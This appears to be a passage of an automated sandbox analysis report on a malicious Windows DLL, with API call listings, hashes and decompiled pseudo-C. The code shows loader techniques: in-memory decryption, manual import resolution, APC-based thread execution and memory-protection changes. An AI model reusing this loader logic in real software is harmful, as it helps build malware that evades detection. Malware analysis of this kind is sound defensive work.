              • VirtualProtect.KERNEL32(6E1C0000,00000000,00000004,6E297167), ref: 6E297417
              • VirtualProtect.KERNEL32(6E1C0000,00001000,00000004,6E297167), ref: 6E29743E
              • VirtualProtect.KERNEL32(00000000,?,00000002,6E297167), ref: 6E29750B
              • VirtualProtect.KERNEL32(00000000,?,00000002,6E297167,?), ref: 6E297561
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E29757D
              Memory Dump Source
              • Source File: 00000000.00000002.461300505.000000006E296000.00000040.00020000.sdmp, Offset: 6E296000, based on PE: false
              Similarity
              • API ID: Virtual$Protect$Alloc$Free
              • String ID:
              • API String ID: 2574235972-0
              • Opcode ID: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
              • Instruction ID: 1680e39e4f1abc5d00b3de2304b19bf1a97eaed0b398433b3e31cdd07c0bbce8
              • Opcode Fuzzy Hash: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
              • Instruction Fuzzy Hash: D2D19D36500203AFDB16CF55C8A0B5177A6FF89310B0B4598ED1AEF3DAD771A80ADB64
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID:
              • String ID: PR)n$T$W
              • API String ID: 0-3270365719
              • Opcode ID: e951073df6e2001df1faf367814b67fef01e31d65a272cf1ce0837f7aa57a745
              • Instruction ID: 3d9fb1e5917b4f8cb47394d87f31f94bc9fe20393a7096d78658644b2affa550
              • Opcode Fuzzy Hash: e951073df6e2001df1faf367814b67fef01e31d65a272cf1ce0837f7aa57a745
              • Instruction Fuzzy Hash: D092A0B1A597528FDB04CFBAD49825ABBE3BB9A306F24592EE494C3344D3348449CF71
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
              				long _v8;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				char _t9;
              				void* _t10;
              				void* _t18;
              				void* _t23;
              				void* _t36;
              
              				_push(__ecx);
              				_t9 = _a8;
              				_v8 = 1;
              				if(_t9 == 0) {
              					_t10 = InterlockedDecrement(0x6e1c4188);
              					__eflags = _t10;
              					if(_t10 == 0) {
              						__eflags =  *0x6e1c418c;
              						if( *0x6e1c418c != 0) {
              							_t36 = 0x2328;
              							while(1) {
              								SleepEx(0x64, 1);
              								__eflags =  *0x6e1c4198;
              								if( *0x6e1c4198 == 0) {
              									break;
              								}
              								_t36 = _t36 - 0x64;
              								__eflags = _t36;
              								if(_t36 > 0) {
              									continue;
              								}
              								break;
              							}
              							CloseHandle( *0x6e1c418c);
              						}
              						HeapDestroy( *0x6e1c4190);
              					}
              				} else {
              					if(_t9 == 1 && InterlockedIncrement(0x6e1c4188) == 1) {
              						_t18 = HeapCreate(0, 0x400000, 0); // executed
              						_t41 = _t18;
              						 *0x6e1c4190 = _t18;
              						if(_t18 == 0) {
              							L6:
              							_v8 = 0;
              						} else {
              							 *0x6e1c41b0 = _a4;
              							asm("lock xadd [eax], edi");
              							_push( &_a8);
              							_t23 = E6E1C13D1(E6E1C20CE, E6E1C121C(_a12, 1, 0x6e1c4198, _t41));
              							 *0x6e1c418c = _t23;
              							if(_t23 == 0) {
              								asm("lock xadd [esi], eax");
              								goto L6;
              							}
              						}
              					}
              				}
              				return _v8;
              			}

              APIs
              • InterlockedIncrement.KERNEL32(6E1C4188), ref: 6E1C1DD0
              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1C1DE5
                • Part of subcall function 6E1C13D1: CreateThread.KERNELBASE ref: 6E1C13E8
                • Part of subcall function 6E1C13D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1C13FD
                • Part of subcall function 6E1C13D1: GetLastError.KERNEL32(00000000), ref: 6E1C1408
                • Part of subcall function 6E1C13D1: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1C1412
                • Part of subcall function 6E1C13D1: CloseHandle.KERNEL32(00000000), ref: 6E1C1419
                • Part of subcall function 6E1C13D1: SetLastError.KERNEL32(00000000), ref: 6E1C1422
              • InterlockedDecrement.KERNEL32(6E1C4188), ref: 6E1C1E38
              • SleepEx.KERNEL32(00000064,00000001), ref: 6E1C1E52
              • CloseHandle.KERNEL32 ref: 6E1C1E6E
              • HeapDestroy.KERNEL32 ref: 6E1C1E7A
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
• Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
• Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
              • String ID:
              • API String ID: 2110400756-0
              • Opcode ID: 93c57b8fb87c938260d5d050e5ec8779caa9878904f591e7b09f614ed0812f3f
              • Instruction ID: 8f3352a58246418d07f1a9f43faede5fccf891133e5ec329b7854fec8119d5f0
              • Opcode Fuzzy Hash: 93c57b8fb87c938260d5d050e5ec8779caa9878904f591e7b09f614ed0812f3f
              • Instruction Fuzzy Hash: 4821CF36744601AFEB019FE9C88CA4A3FB8F772E603218125E448D3140D23CA986FB52
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C13D1(long _a4, DWORD* _a12) {
              				_Unknown_base(*)()* _v0;
              				void* _t4;
              				long _t6;
              				long _t11;
              				void* _t13;
              
              				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1c41cc, 0, _a12); // executed
              				_t13 = _t4;
              				if(_t13 != 0) {
              					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
              					if(_t6 == 0) {
              						_t11 = GetLastError();
              						TerminateThread(_t13, _t11);
              						CloseHandle(_t13);
              						_t13 = 0;
              						SetLastError(_t11);
              					}
              				}
              				return _t13;
              			}

              APIs
              • CreateThread.KERNELBASE ref: 6E1C13E8
              • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1C13FD
              • GetLastError.KERNEL32(00000000), ref: 6E1C1408
              • TerminateThread.KERNEL32(00000000,00000000), ref: 6E1C1412
              • CloseHandle.KERNEL32(00000000), ref: 6E1C1419
              • SetLastError.KERNEL32(00000000), ref: 6E1C1422
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
• Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
• Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
              • String ID:
              • API String ID: 3832013932-0
              • Opcode ID: 52e76519a5a94b95598527cb7ce9f70990b0919b872d196cc21a6142f7820c10
              • Instruction ID: 1e0629bde33280a18db333d60db0f8d39a5fb3288d0537c365b588c66174f1de
              • Opcode Fuzzy Hash: 52e76519a5a94b95598527cb7ce9f70990b0919b872d196cc21a6142f7820c10
              • Instruction Fuzzy Hash: 1EF01C37205B21BBDB125BA08C0CF9FBF69FB1AF51F00C444F609D1150C72A8866BBA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E6E1C18AD(void* __edi, intOrPtr _a4) {
              				intOrPtr _v8;
              				char _v12;
              				void* _v16;
              				unsigned int _v20;
              				intOrPtr _v24;
              				char _v28;
              				signed int _v32;
              				void* _v36;
              				signed int _v40;
              				signed char _v44;
              				void* _v48;
              				signed int _v56;
              				signed int _v60;
              				intOrPtr _t50;
              				void* _t57;
              				void* _t61;
              				signed int _t67;
              				signed char _t69;
              				signed char _t70;
              				void* _t76;
              				intOrPtr _t77;
              				unsigned int _t82;
              				intOrPtr _t86;
              				intOrPtr* _t89;
              				intOrPtr _t90;
              				void* _t91;
              				signed int _t93;
              
              				_t90 =  *0x6e1c41b0;
              				_t50 = E6E1C1000(_t90,  &_v28,  &_v20);
              				_v24 = _t50;
              				if(_t50 == 0) {
              					asm("sbb ebx, ebx");
              					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
              					_t91 = _t90 + _v28;
              					_v48 = _t91;
              					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
              					_t76 = _t57;
              					_v36 = _t76;
              					if(_t76 == 0) {
              						_v24 = 8;
              					} else {
              						_t69 = 0;
              						if(_t67 <= 0) {
              							_t77 =  *0x6e1c41cc;
              						} else {
              							_t86 = _a4;
              							_v8 = _t91;
              							_v8 = _v8 - _t76;
              							_t14 = _t86 + 0x6e1c5137; // 0xc7b49ffa
              							_t61 = _t57 - _t91 + _t14;
              							_v16 = _t76;
              							do {
              								asm("movsd");
              								asm("movsd");
              								asm("movsd");
              								_t70 = _t69 + 1;
              								_v44 = _t70;
              								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
              								if(_t82 != 0) {
              									_v32 = _v32 & 0x00000000;
              									_t89 = _v16;
              									_v12 = 0x400;
              									do {
              										_t93 =  *((intOrPtr*)(_v8 + _t89));
              										_v40 = _t93;
              										if(_t93 == 0) {
              											_v12 = 1;
              										} else {
              											 *_t89 = _t93 + _v32 - _t82;
              											_v32 = _v40;
              											_t89 = _t89 + 4;
              										}
              										_t33 =  &_v12;
              										 *_t33 = _v12 - 1;
              									} while ( *_t33 != 0);
              								}
              								_t69 = _v44;
              								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
              								_v16 = _v16 + 0x1000;
              								 *0x6e1c41cc = _t77;
              							} while (_t69 < _t67);
              						}
              						if(_t77 != 0x63699bc3) {
              							_v24 = 0xc;
              						} else {
              							memcpy(_v48, _v36, _v20);
              						}
              						VirtualFree(_v36, 0, 0x8000); // executed
              					}
              				}
              				return _v24;
              			}

              APIs
              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1C1903
              • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1C19C9
              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E1C19E4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
• Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
• Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: Virtual$AllocFreememcpy
              • String ID: Jun 6 2021
              • API String ID: 4010158826-1013970402
              • Opcode ID: 9041a89bcec87a96430e14d1da3950d0a1523ac08092a97f323d91dd00585abe
              • Instruction ID: 946bd0d6041729a63682bd53d4e662095b0b71ab877402adc9a4d5ab533848a2
              • Opcode Fuzzy Hash: 9041a89bcec87a96430e14d1da3950d0a1523ac08092a97f323d91dd00585abe
              • Instruction Fuzzy Hash: BB419171E4020A9FDF00CFD9C844ADEBBB5BF59B10F248129D905B7244C779AA46DF92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E6E1C20CE(void* __ecx, intOrPtr _a4) {
              				long _t3;
              				int _t4;
              				int _t9;
              				void* _t13;
              
              				_t13 = GetCurrentThread();
              				_t3 = SetThreadAffinityMask(_t13, 1); // executed
              				if(_t3 != 0) {
              					SetThreadPriority(_t13, 0xffffffff); // executed
              				}
              				_t4 = E6E1C1C7D(_a4); // executed
              				_t9 = _t4;
              				if(_t9 == 0) {
              					SetThreadPriority(_t13, _t4);
              				}
              				asm("lock xadd [eax], ecx");
              				return _t9;
              			}

              APIs
              • GetCurrentThread.KERNEL32 ref: 6E1C20D1
              • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1C20DC
              • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1C20EF
              • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1C2102
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
• Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
• Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: Thread$Priority$AffinityCurrentMask
              • String ID:
              • API String ID: 1452675757-0
              • Opcode ID: 933d557eee8d911dd6a402775c867d4bb5510db097fbc0c16182fbf50dc663b2
              • Instruction ID: 2c79e13bd90c19555bf51c108f274b45117525a1d704e67eb3550663ab7717a1
              • Opcode Fuzzy Hash: 933d557eee8d911dd6a402775c867d4bb5510db097fbc0c16182fbf50dc663b2
              • Instruction Fuzzy Hash: 5CE09232305A112B96016B6D4C8CEAFAB9CEFA2B307110235F524D21D0CF9C8C5AB5AA
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetTempPathA.KERNEL32(00000404,6E296410,?), ref: 6E291A78
              • VirtualProtect.KERNELBASE(?,0000311B,00000040,?), ref: 6E291ACB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: PathProtectTempVirtual
              • String ID: @
              • API String ID: 3422257996-2766056989
              • Opcode ID: 96b367ceb8b84aa88f6892ffd6cf1cab6d122d737cbd145f412c7706924fe3cb
              • Instruction ID: e63cf76e46b8c40e7ecaee793d322dc0eb3f9865a1344321cf64369ce3d49a0f
              • Opcode Fuzzy Hash: 96b367ceb8b84aa88f6892ffd6cf1cab6d122d737cbd145f412c7706924fe3cb
              • Instruction Fuzzy Hash: 4BA16CB0E42505CBDB08CFBAC48866DBBB3FF4A30AF54A12AD525A7359D7345540CB74
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              APIs
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C12
                • Part of subcall function 6E22FA7E: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E22FA8A
                • Part of subcall function 6E22FA7E: __crtGetLocaleInfoA_stat.LIBCMT ref: 6E22FA9F
              • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6E223C24
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C44
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C86
              • __calloc_crt.LIBCMT ref: 6E223C59
                • Part of subcall function 6E223A00: __calloc_impl.LIBCMT ref: 6E223A0F
              • __calloc_crt.LIBCMT ref: 6E223C9B
              • _free.LIBCMT ref: 6E223CB3
              • _free.LIBCMT ref: 6E223CF3
              • __calloc_crt.LIBCMT ref: 6E223D1D
              • _free.LIBCMT ref: 6E223D43
              • __invoke_watson.LIBCMT ref: 6E223D93
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
              • String ID:
              • API String ID: 1731282729-0
              • Opcode ID: 890426af0763d8a41b789f8a4739d93e799ac05cf50d20d97ab1d572d7c9b804
              • Instruction ID: 91a273b7995749c39333252be1b6a8c94678e58d70d3b27ba582f3c2f350ef32
              • Opcode Fuzzy Hash: 890426af0763d8a41b789f8a4739d93e799ac05cf50d20d97ab1d572d7c9b804
              • Instruction Fuzzy Hash: FA515FB990421FAFEB649FA58D49BDA7B7EFF04314F1044B5E908A6241EF3289548B60
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _wcscmp.LIBCMT ref: 6E22E86E
              • _wcscmp.LIBCMT ref: 6E22E87F
              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E22E89B
              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E22E8C5
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: InfoLocale_wcscmp
              • String ID:
              • API String ID: 1351282208-0
              • Opcode ID: 27e5bda060de6d18f2e622aa396480e475bb136b80e8be7d726de2fb2209c736
              • Instruction ID: d72f3ebb0ab87946e1b9d78f32fac50a19ea9ced617190429f4e59992035ade0
              • Opcode Fuzzy Hash: 27e5bda060de6d18f2e622aa396480e475bb136b80e8be7d726de2fb2209c736
              • Instruction Fuzzy Hash: F501843525851EAFFB429EE8C845ECA37DEAF05656B008435F944DA1A0E730D580E7D2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C1F10() {
              				void* _t1;
              				long _t3;
              				void* _t4;
              				long _t5;
              				void* _t6;
              				intOrPtr _t8;
              
              				_t8 =  *0x6e1c41b0;
              				_t1 = CreateEventA(0, 1, 0, 0);
              				 *0x6e1c41bc = _t1;
              				if(_t1 == 0) {
              					return GetLastError();
              				}
              				_t3 = GetVersion();
              				if(_t3 <= 5) {
              					_t4 = 0x32;
              					return _t4;
              				} else {
              					 *0x6e1c41ac = _t3;
              					_t5 = GetCurrentProcessId();
              					 *0x6e1c41a8 = _t5;
              					 *0x6e1c41b0 = _t8;
              					_t6 = OpenProcess(0x10047a, 0, _t5);
              					 *0x6e1c41a4 = _t6;
              					if(_t6 == 0) {
              						 *0x6e1c41a4 =  *0x6e1c41a4 | 0xffffffff;
              					}
              					return 0;
              				}
              			}

              APIs
              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1C1C8E,74B063F0,00000000), ref: 6E1C1F1F
              • GetVersion.KERNEL32 ref: 6E1C1F2E
              • GetCurrentProcessId.KERNEL32 ref: 6E1C1F3D
              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1C1F56
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
• Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
• Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
• Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: Process$CreateCurrentEventOpenVersion
              • String ID:
              • API String ID: 845504543-0
              • Opcode ID: 40b5d2db281a1f08b3abba376e25a0ec80b613e9ee2c174c19d5b12452c20036
              • Instruction ID: 51aa3f2096f753addaedce12120e78271127343c77df0434785102bce9e58d26
              • Opcode Fuzzy Hash: 40b5d2db281a1f08b3abba376e25a0ec80b613e9ee2c174c19d5b12452c20036
              • Instruction Fuzzy Hash: ADF01D72688A10AFEF509FA9A81E7893FB4B72BF11F108059F199C91C0D3786447BB45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 58%
              			E6E1C1E8A(void* __ecx) {
              				char _v8;
              				signed short _t7;
              
              				_v8 = _v8 & 0x00000000;
              				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
              				if(_t7 == 0) {
              					__imp__GetSystemDefaultUILanguage();
              					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
              				}
              				return _v8;
              			}

              APIs
              • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6E1C1B27,?,6E1C1CE6,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1E9F
              • GetSystemDefaultUILanguage.KERNEL32(?,?,6E1C1B27,?,6E1C1CE6,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1EA9
              • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E1C1B27,?,6E1C1CE6,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1EBC
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: Language$DefaultInfoLocaleNameSystem
              • String ID:
              • API String ID: 3724080410-0
              • Opcode ID: bfe6726ae040d01ddf4c0565af9bc4ecad39fbc3282865721a254cb0eae93362
              • Instruction ID: a1ef0b69b5290e8a8571ae763b75fba86f64ce0cb440108822c11f2e57b5a6be
              • Opcode Fuzzy Hash: bfe6726ae040d01ddf4c0565af9bc4ecad39fbc3282865721a254cb0eae93362
              • Instruction Fuzzy Hash: ECE04874640204F6E700E7918C0AFBD76BCA711F0AF504084F701D60C0D7789A49B765
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C1F7C(void* __edi, intOrPtr _a4) {
              				signed int _v8;
              				intOrPtr* _v12;
              				_Unknown_base(*)()** _v16;
              				signed int _v20;
              				signed short _v24;
              				struct HINSTANCE__* _v28;
              				intOrPtr _t43;
              				intOrPtr* _t45;
              				intOrPtr _t46;
              				struct HINSTANCE__* _t47;
              				intOrPtr* _t49;
              				intOrPtr _t50;
              				signed short _t51;
              				_Unknown_base(*)()* _t53;
              				CHAR* _t54;
              				_Unknown_base(*)()* _t55;
              				void* _t58;
              				signed int _t59;
              				_Unknown_base(*)()* _t60;
              				intOrPtr _t61;
              				intOrPtr _t65;
              				signed int _t68;
              				void* _t69;
              				CHAR* _t71;
              				signed short* _t73;
              
              				_t69 = __edi;
              				_v20 = _v20 & 0x00000000;
              				_t59 =  *0x6e1c41cc;
              				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
              				if(_t43 != 0) {
              					_t45 = _t43 + __edi;
              					_v12 = _t45;
              					_t46 =  *((intOrPtr*)(_t45 + 0xc));
              					if(_t46 != 0) {
              						while(1) {
              							_t71 = _t46 + _t69;
              							_t47 = LoadLibraryA(_t71);
              							_v28 = _t47;
              							if(_t47 == 0) {
              								break;
              							}
              							_v24 = _v24 & 0x00000000;
              							 *_t71 = _t59 - 0x63699bc3;
              							_t49 = _v12;
              							_t61 =  *((intOrPtr*)(_t49 + 0x10));
              							_t50 =  *_t49;
              							if(_t50 != 0) {
              								L6:
              								_t73 = _t50 + _t69;
              								_v16 = _t61 + _t69;
              								while(1) {
              									_t51 =  *_t73;
              									if(_t51 == 0) {
              										break;
              									}
              									if(__eflags < 0) {
              										__eflags = _t51 - _t69;
              										if(_t51 < _t69) {
              											L12:
              											_t21 =  &_v8;
              											 *_t21 = _v8 & 0x00000000;
              											__eflags =  *_t21;
              											_v24 =  *_t73 & 0x0000ffff;
              										} else {
              											_t65 = _a4;
              											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
              											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
              												goto L12;
              											} else {
              												goto L11;
              											}
              										}
              									} else {
              										_t51 = _t51 + _t69;
              										L11:
              										_v8 = _t51;
              									}
              									_t53 = _v8;
              									__eflags = _t53;
              									if(_t53 == 0) {
              										_t54 = _v24 & 0x0000ffff;
              									} else {
              										_t54 = _t53 + 2;
              									}
              									_t55 = GetProcAddress(_v28, _t54);
              									__eflags = _t55;
              									if(__eflags == 0) {
              										_v20 = _t59 - 0x63699b44;
              									} else {
              										_t68 = _v8;
              										__eflags = _t68;
              										if(_t68 != 0) {
              											 *_t68 = _t59 - 0x63699bc3;
              										}
              										 *_v16 = _t55;
              										_t58 = 0x725990f8 + _t59 * 4;
              										_t73 = _t73 + _t58;
              										_t32 =  &_v16;
              										 *_t32 = _v16 + _t58;
              										__eflags =  *_t32;
              										continue;
              									}
              									goto L23;
              								}
              							} else {
              								_t50 = _t61;
              								if(_t61 != 0) {
              									goto L6;
              								}
              							}
              							L23:
              							_v12 = _v12 + 0x14;
              							_t46 =  *((intOrPtr*)(_v12 + 0xc));
              							if(_t46 != 0) {
              								continue;
              							} else {
              							}
              							L26:
              							goto L27;
              						}
              						_t60 = _t59 + 0x9c9664bb;
              						__eflags = _t60;
              						_v20 = _t60;
              						goto L26;
              					}
              				}
              				L27:
              				return _v20;
              			}

              APIs
              • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E1C1FB4
              • GetProcAddress.KERNEL32(?,00000000), ref: 6E1C2026
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID:
              • API String ID: 2574300362-0
              • Opcode ID: c748fc5e8b8994ffc6bb63df03aa65b9411437cb7578e2276a3303b1141ca453
              • Instruction ID: f992cfdbcde13cd31fb28b6e3f1b0a89e489c140df5a262a14a975afbff3f888
              • Opcode Fuzzy Hash: c748fc5e8b8994ffc6bb63df03aa65b9411437cb7578e2276a3303b1141ca453
              • Instruction Fuzzy Hash: AA316B71A00606DFDB40CF99C894AAEB7F4FF29B00B20406ED815E7344E778DA95EB52
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E21DE7B,?,?,?,00000001), ref: 6E225ED7
              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 6E225EE0
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 0a64ca376d2289adb0fc86531030cac370ce7df85bdf6a34aa8bc7017b01ef54
              • Instruction ID: b4e9e01e183c2e2d80f675104cff8235a2f90f47ed9c16f6315829cc9577a6e1
              • Opcode Fuzzy Hash: 0a64ca376d2289adb0fc86531030cac370ce7df85bdf6a34aa8bc7017b01ef54
              • Instruction Fuzzy Hash: 48B09271244608ABDE002B9DD90EB8C3F6AEB06A62F044010F60D880508B725451CAA1
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID:
              • String ID: @$^0
              • API String ID: 0-2280991083
              • Opcode ID: 0c69ca46b49daba09c74fb2618b2adb89fafeadf74ac7722f99a23064b1f137e
              • Instruction ID: ee2cc6879270804a9077a07fd7523ba3f52f1e9f83bb6287f500aa8599bd2cc2
              • Opcode Fuzzy Hash: 0c69ca46b49daba09c74fb2618b2adb89fafeadf74ac7722f99a23064b1f137e
              • Instruction Fuzzy Hash: 7FF143B0B868518FCB08CFBFC498B197BA3FB8630AB48A239D96597359C7345444DB74
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C2485(long _a4) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				signed int _v16;
              				short* _v32;
              				void _v36;
              				void* _t57;
              				signed int _t58;
              				signed int _t61;
              				signed int _t62;
              				void* _t63;
              				signed int* _t68;
              				intOrPtr* _t69;
              				intOrPtr* _t71;
              				intOrPtr _t72;
              				intOrPtr _t75;
              				void* _t76;
              				signed int _t77;
              				void* _t78;
              				void _t80;
              				signed int _t81;
              				signed int _t84;
              				signed int _t86;
              				short* _t87;
              				void* _t89;
              				signed int* _t90;
              				long _t91;
              				signed int _t93;
              				signed int _t94;
              				signed int _t100;
              				signed int _t102;
              				void* _t104;
              				long _t108;
              				signed int _t110;
              
              				_t108 = _a4;
              				_t76 =  *(_t108 + 8);
              				if((_t76 & 0x00000003) != 0) {
              					L3:
              					return 0;
              				}
              				_a4 =  *[fs:0x4];
              				_v8 =  *[fs:0x8];
              				if(_t76 < _v8 || _t76 >= _a4) {
              					_t102 =  *(_t108 + 0xc);
              					__eflags = _t102 - 0xffffffff;
              					if(_t102 != 0xffffffff) {
              						_t91 = 0;
              						__eflags = 0;
              						_a4 = 0;
              						_t57 = _t76;
              						do {
              							_t80 =  *_t57;
              							__eflags = _t80 - 0xffffffff;
              							if(_t80 == 0xffffffff) {
              								goto L9;
              							}
              							__eflags = _t80 - _t91;
              							if(_t80 >= _t91) {
              								L20:
              								_t63 = 0;
              								L60:
              								return _t63;
              							}
              							L9:
              							__eflags =  *(_t57 + 4);
              							if( *(_t57 + 4) != 0) {
              								_t12 =  &_a4;
              								 *_t12 = _a4 + 1;
              								__eflags =  *_t12;
              							}
              							_t91 = _t91 + 1;
              							_t57 = _t57 + 0xc;
              							__eflags = _t91 - _t102;
              						} while (_t91 <= _t102);
